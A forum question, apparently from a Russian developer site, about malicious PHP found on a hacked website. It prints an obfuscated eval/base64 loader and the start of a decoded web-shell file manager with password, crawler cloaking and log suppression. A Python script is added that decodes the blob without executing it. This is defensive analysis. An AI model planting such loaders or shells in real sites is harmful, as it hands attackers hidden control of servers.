What does this malicious PHP do?

My site was hacked and I found this on it:

<?php
echo eval(base64_decode(str_replace('*','a',str_replace('%','B',str_replace('~','F',str_replace('_','z',str_replace('$','x',str_replace('@','d',str_replace('^','3','SOMEVERYLONGTEXT')))))))));

If I decode the base64 without executing it, I get a few scripts, starting with:

$__authentication_pass = "52b1d005abc139cc281a32d8aa7cd1c2";
$color = "#df5";
$__default__action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
@ini_set('error_log', NULL);
.... and many lines below ....

Is this a file manager? Can it somehow be identified (name, author, etc.)?

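The decoding step the question describes, done statically, as an added example that is not part of the original post: it reads the `str_replace` pairs out of the wrapper, undoes the substitutions, base64-decodes the result and lists the quoted settings, without ever calling `eval`. The function names and the sample input are constructed for illustration; `BLOB` stands in for the elided `SOMEVERYLONGTEXT`.

```python
import base64
import re

# One match per str_replace('X','Y', call; the outermost call comes first in the text.
PAIR_RE = re.compile(r"str_replace\(\s*'(.)'\s*,\s*'(.)'\s*,")
# The encoded blob is the quoted argument directly before the run of closing parentheses.
BLOB_RE = re.compile(r"'([^']{8,})'\s*\)+\s*;")
# Top-level string assignments such as $__default__action = 'FilesMan';
ASSIGN_RE = re.compile(r"^\$(\w+)\s*=\s*(['\"])(.*?)\2\s*;", re.M)


def decode_wrapper(php_source):
    """Return the hidden PHP source as text. Nothing is evaluated."""
    pairs = PAIR_RE.findall(php_source)
    found = BLOB_RE.search(php_source)
    if not pairs or found is None:
        raise ValueError("not a str_replace/base64_decode wrapper")
    blob = found.group(1)
    for search, replace in reversed(pairs):  # PHP runs the innermost call first
        blob = blob.replace(search, replace)
    # latin-1 keeps every byte intact whatever charset the script uses
    return base64.b64decode(blob, validate=True).decode("latin-1")


def string_settings(php_text):
    """Map variable name -> value for quoted top-level assignments."""
    return {name: value for name, _quote, value in ASSIGN_RE.findall(php_text)}


# Constructed sample: lines the question shows after decoding, wrapped the same
# way so the example runs offline. BLOB stands in for 'SOMEVERYLONGTEXT'.
PLAIN = ('$__authentication_pass = "52b1d005abc139cc281a32d8aa7cd1c2";\n'
         "$__default__action = 'FilesMan';\n"
         "$default_use_ajax = true;\n")
BLOB = base64.b64encode(PLAIN.encode()).decode().translate(
    str.maketrans("aBFzxd3", "*%~_$@^"))
SAMPLE = ("<?php\necho eval(base64_decode(str_replace('*','a',str_replace('%','B',"
          "str_replace('~','F',str_replace('_','z',str_replace('$','x',"
          "str_replace('@','d',str_replace('^','3','" + BLOB + "')))))))));")

if __name__ == "__main__":
    hidden = decode_wrapper(SAMPLE)
    print(hidden)
    print(string_settings(hidden))
```

Run it against a copy of the file on an analysis machine, not on the web server; the output is text to read and search, never something to pass back to PHP.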

Source: https://habr.com/ru/post/1537855/

